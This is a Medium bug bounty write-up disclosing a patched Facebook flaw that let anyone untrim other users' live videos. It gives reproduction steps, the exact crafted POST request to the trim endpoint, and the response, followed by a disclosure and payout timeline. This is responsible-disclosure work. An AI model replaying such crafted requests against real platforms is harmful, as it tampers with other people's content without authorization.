(POC) Untrim any live video on Facebook

Description / Impact

It’s possible to untrim any live video on Facebook on behalf of the owners.

Impact

This could let a malicious user untrim any live video on Facebook using non GraphQL.

Proof Of Concept / Reprosteps

1. Obtain target live video ID
2. Submit the request with the value above (remember to update your CSRF token)

HTTP POST
/video_broadcast/trim/?new_start_seconds=0&new_end_seconds=99999999&reset_trimming=1&video_id=valueFromStep1&fb_dtsg=

Host: facebook.com

Response

{
“__ar”: 1,
“payload”: {},
“hsrp”: {
“hblp”: {
“sr_revision”: 1002775749,
“consistency”: {
“rev”: 1002775749
}

The target live video has been untrimed on behalf of the owners.

Timeline:

06/10/2020 : Report sent

Triaged by Facebook after 6 hours

10/10/2020: $2875 bounty awarded during BountyCon 2020 (with bonus)

21/10/2020: Patch confirmed by Facebook

Security Researcher

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Getting Started with Breach Simulation

Money Laundering — 4 Ways To Protect Your Business

Money laundering image and protecting your business.

Attention! A Disclaimer from the Cannumo Team

Encrypted backup: Why & How to Encrypt your Backups?

Link to Quantum Attack v Quantum Defense

What is Social Engineering?

Why Capital One isn’t the last breach involving overprivileged Machine Identities

No Judgment Digital Definitions: What is a web tracker?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmad Talahmeh

Ahmad Talahmeh

Security Researcher

More from Medium

Brute It [TryHackMe Writeup]

I was having a discussion with a person who was upset with someone he deemed to be unpalatable and…

TryHackMe: Android Malware Analysis Walkthrough

Yogosha Christmas Challenge 2021 Writeup